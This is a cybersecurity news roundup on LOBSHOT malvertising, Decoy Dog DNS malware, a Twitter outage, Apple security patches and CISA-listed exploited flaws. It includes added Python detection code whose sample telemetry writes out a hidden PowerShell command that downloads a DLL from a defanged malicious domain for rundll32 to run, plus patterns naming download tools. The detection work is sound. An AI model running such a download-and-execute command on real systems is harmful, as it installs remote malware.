Hackerzhome


Cybersecurity news all over the world

HACKERZHOME NEWS

May 2, 2023

Tuesday

New LOBSHOT spyware gives hackers hidden VNC access to Windows devices.

A new malware called ‘LOBSHOT’, distributed through Google advertisements, lets threat actors use hidden VNC (hVNC) to covertly take control of compromised Windows PCs.


These malvertising campaigns mimicked the websites of a variety of programs, including 7-ZIP, VLC, OBS, Notepad++, CCleaner, TradingView, Rufus, and many more.


Instead of delivering the legitimate software, these sites pushed malware including Gozi, RedLine, Vidar, Cobalt Strike, SectoRAT, and the Royal Ransomware.


One such site distributed a malicious MSI file that ran a PowerShell command to download a DLL from download-cdn[.]com, a domain previously linked to the TA505/Clop ransomware gang.


It is unknown whether TA505 is still using this domain; Proofpoint threat researcher Tommy Madjar previously told BleepingComputer that it had changed hands.


The LOBSHOT malware is contained in the downloaded DLL, which is saved to the C:\ProgramData folder and then executed by RunDLL32.exe.


Elastic Security Labs, whose research documents the malware, writes: “Since last July, we have viewed more than 500 different LOBSHOT samples. The samples we have seen are often constructed as 32-bit DLLs or 32-bit executables between 93 KB and 124 KB in size.”


Once run, the malware checks whether Microsoft Defender is active and, if so, terminates itself to avoid detection.
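The delivery chain described above (MSI installer, PowerShell download into C:\ProgramData, rundll32.exe loading the dropped DLL) is a process tree that endpoint telemetry can catch. The following is an added detection example, not code from the article or from Elastic; the process-creation events are constructed in the Sysmon Event ID 1 style, with made-up paths and pids, and the rule names and thresholds are this example's own.

```python
"""Added detection logic (not from the article) for the LOBSHOT delivery chain:
an MSI installer runs PowerShell, which downloads a DLL into C:\\ProgramData,
and rundll32.exe then executes that DLL.

The events below are constructed, Sysmon-style process-creation records;
field names mirror Sysmon Event ID 1 (Image, ParentImage, CommandLine)
but every value is made up for this example.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int            # parent process id
    image: str           # full path of the created process
    command_line: str


# Constructed sample telemetry: one benign rundll32 use (pid 500) and one
# chain matching the article (pids 200 -> 300 -> 400).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i C:\Users\u\Downloads\7zip-setup.msi"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "iwr hxxp://download-cdn[.]com/x.dll '
              '-OutFile C:\\ProgramData\\x.dll"'),
    ProcEvent(400, 300, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\ProgramData\x.dll,DllMain"),
    ProcEvent(500, 100, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL"),
]

# A path under ProgramData, and the usual PowerShell download primitives.
PROGRAMDATA_PATH = re.compile(r"c:\\programdata\\", re.IGNORECASE)
DOWNLOAD_PRIMITIVE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|curl|wget|start-bitstransfer)\b",
    re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestor_images(ev: ProcEvent, by_pid: dict) -> list:
    """Image basenames of ev's ancestors, nearest parent first (cycle-safe)."""
    out, seen = [], set()
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        out.append(_basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return out


def find_suspicious_chains(events: list) -> list:
    """Return (rule_name, pid) findings for the LOBSHOT-style chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        name = _basename(ev.image)
        ancestors = ancestor_images(ev, by_pid)
        # Rule 1: PowerShell descended from an MSI install that downloads
        # something into ProgramData.
        if (name == "powershell.exe" and "msiexec.exe" in ancestors
                and DOWNLOAD_PRIMITIVE.search(ev.command_line)
                and PROGRAMDATA_PATH.search(ev.command_line)):
            findings.append(("msi_powershell_download_to_programdata", ev.pid))
        # Rule 2: rundll32 executing a DLL that lives under ProgramData;
        # escalate when the chain also leads back to msiexec.
        if name == "rundll32.exe" and PROGRAMDATA_PATH.search(ev.command_line):
            severity = "high" if "msiexec.exe" in ancestors else "medium"
            findings.append((f"rundll32_dll_from_programdata_{severity}", ev.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The ancestor walk is what keeps the rundll32 rule from drowning in noise: rundll32 loading a DLL from ProgramData is merely unusual on its own, but the same event with msiexec in its ancestry is the exact shape of the campaign described here. The second rule would also fire on the article's note that the malware exits when Defender is running, since the short-lived rundll32 process is still created first.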


Twitter outage logs users out and prevents them from logging back in.

A Twitter outage has logged many users out of the website and left them unable to log back in.

Starting at around 3:45 PM ET, thousands of Twitter users reported on DownDetector that they had been abruptly logged out of the desktop website.

Attempts to log back into the website appeared to succeed, but the site instead redirected to the logout URL.

My account was locked out in Mozilla Firefox, but not in Google Chrome, suggesting that this issue appears to only affect Chrome and Chromebook users.

The website asked me for more details after I tried to connect back to Twitter with Google Chrome a second time, claiming that the account had strange activity.

Other users caught in the constant cycle of logins and logouts do not appear to be affected in the same way.

Neither Twitter’s status page nor its support account lists any issues, so we will likely have to wait for the outage to resolve on its own.


iPhones are unable to install Apple's initial Rapid Security Response patch.

Some users are having trouble installing Apple’s first Rapid Security Response (RSR) patches on their iPhones for iOS 16.4.1 and macOS 13.3.1 devices.

RSR patches, as the company explains in a recently published support page, are small updates for the iPhone, iPad, and Mac platforms that fix security flaws in between major software releases.

Some of these out-of-band security patches may also be used to fix flaws that are being actively exploited in attacks.

To check whether RSR patches are available for your device:

1. iPhone or iPad: go to Settings > General > Software Update > Automatic Updates and make sure “Security Responses & System Files” is enabled.

2. Mac: open System Settings from the Apple menu, select General from the sidebar, then click Software Update on the right. Select “Install Security Responses and system files” and then click the Show Details button next to Automatic Updates.


Enterprise networks are the target of a newly discovered Decoy Dog malware toolkit.

An advanced malware toolkit called Decoy Dog, which targets enterprise networks, was found after analysis of more than 70 billion DNS records.

As its name suggests, Decoy Dog is elusive: it uses techniques such as strategic domain aging and DNS query dribbling, sending only a trickle of queries to its command-and-control (C2) domains so as not to raise red flags.

In an advisory late last month, Infoblox described Decoy Dog as a cohesive toolkit with a number of highly unusual characteristics that make it uniquely identifiable, particularly when its domains are examined at the DNS level.

The cybersecurity company said the malware’s distinctive properties allowed it to map further domains belonging to the attack infrastructure. The malware was discovered in early April 2023 on the basis of anomalous DNS beaconing activity, the company said.

The DNS signature of Decoy Dog matches less than 0.0000027% of the 370 million active domains on the internet, making its use in the wild “very rare,” according to the California-based startup.

One of the toolkit’s main components is Pupy RAT, an open-source trojan controlled via DNS tunneling, in which DNS queries and responses serve as the C2 channel for covertly delivering payloads.
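The two DNS-level traits the article attributes to Decoy Dog, a low but very regular query cadence to a C2 domain and DNS tunneling that carries data in subdomain labels, can be scored from a resolver log. The example below is added here and is not Infoblox's or Pupy's code; the query log, client addresses, domain names and thresholds are all constructed for illustration, and domain aging is not modelled since it needs registration history the log does not contain.

```python
"""Added DNS-beaconing and tunnelling heuristics (not Infoblox's code) in the
spirit of the Decoy Dog write-up: low-volume, highly regular queries to one
domain, each carrying a fresh high-entropy subdomain label.

The log below is constructed for the example; the domains, clients and
thresholds are assumptions, not indicators from the article.
"""
import math
import statistics
from collections import Counter, defaultdict


def build_sample_log():
    """Constructed (ts, client, qname) records: one beaconing host, one normal host."""
    log = []
    # Beaconing host: one query every ~60 s (<=2 s jitter), new random-looking label each time.
    labels = ["6b1d9e0f3a7c", "e4a2c8d1f90b", "0f7b3e9a6c2d",
              "9c4e1a7d3b8f", "2d8f6b0e4a1c", "b7e3d9c1a5f0"]
    for i, lab in enumerate(labels):
        log.append((1000 + 60 * i + (i % 3), "10.0.0.5", f"{lab}.cdn-sync.example"))
    # Normal host: irregular lookups of a static name.
    for t in (1003, 1011, 1044, 1197, 1230, 1392):
        log.append((t, "10.0.0.9", "www.example.org"))
    return sorted(log)


def shannon_entropy(s: str) -> float:
    """Bits per character of s; 0 for empty or single-symbol strings."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registered_domain(qname: str) -> str:
    """Last two labels. A real deployment would use the Public Suffix List."""
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else qname


def analyze(log, min_queries=5, max_cv=0.10, min_entropy=3.0):
    """Per (client, domain) statistics plus 'periodic' and 'tunnel_like' verdicts."""
    groups = defaultdict(list)
    for ts, client, qname in log:
        groups[(client, registered_domain(qname))].append((ts, qname))
    results = {}
    for (client, domain), rows in groups.items():
        if len(rows) < min_queries:
            continue
        rows.sort()
        times = [ts for ts, _ in rows]
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean_gap = statistics.fmean(gaps)
        # Coefficient of variation: a beacon's gaps cluster tightly around the mean.
        cv = statistics.stdev(gaps) / mean_gap if mean_gap > 0 else float("inf")
        # Leftmost label of each query; tunnelled data shows up as long,
        # high-entropy, never-repeating labels.
        labels = [q.split(".")[0] for _, q in rows if q != domain]
        mean_entropy = statistics.fmean([shannon_entropy(l) for l in labels]) if labels else 0.0
        all_unique = bool(labels) and len(set(labels)) == len(labels)
        results[(client, domain)] = {
            "queries": len(rows),
            "mean_gap_s": round(mean_gap, 1),
            "cv": round(cv, 3),
            "mean_label_entropy": round(mean_entropy, 2),
            "periodic": cv <= max_cv,
            "tunnel_like": all_unique and mean_entropy >= min_entropy,
        }
    return results


def flag_suspects(log):
    """(client, domain) pairs that are both periodic and tunnel-like."""
    return sorted(k for k, v in analyze(log).items() if v["periodic"] and v["tunnel_like"])


if __name__ == "__main__":
    for key, stats in analyze(build_sample_log()).items():
        print(key, stats)
    print("suspects:", flag_suspects(build_sample_log()))
```

Scoring per (client, registered domain) rather than per query is what makes the "dribbling" visible: six queries an hour are nothing on their own, but six queries sixty seconds apart, each with a label that never repeats, is a pattern no caching client produces. The thresholds here are deliberately tight to keep the constructed data readable; in production they would be tuned against a baseline of the organisation's own resolver traffic.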

Alert: TP-Link, Apache, and Oracle Vulnerabilities Are Being Actively Exploited

Based on proof of active exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three vulnerabilities to the list of Known Exploited Vulnerabilities (KEV).

The following are the security flaws: CVE-2023-1389 (CVSS score: 8.8), CVE-2021-45046 (CVSS score: 9.0), CVE-2023-21839 (CVSS score: 7.5).

CVE-2023-1389 is a command injection flaw in TP-Link Archer AX-21 routers that could be used to achieve remote code execution.

The vulnerability has been exploited by threat actors connected to the Mirai botnet since April 11, 2023, according to Trend Micro’s Zero Day Initiative.

The second addition to the KEV catalog, CVE-2021-45046, is a remote code execution flaw in the Apache Log4j2 logging library that was discovered in December 2021.

It is currently unclear how this specific vulnerability is being exploited in the wild, although data gathered by GreyNoise shows exploitation attempts from as many as 74 different IP addresses over the past 30 days; that activity also covers CVE-2021-44228.

Rounding out the list is a high-severity flaw in Oracle WebLogic Server versions 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 that could allow unauthorized access to sensitive data.
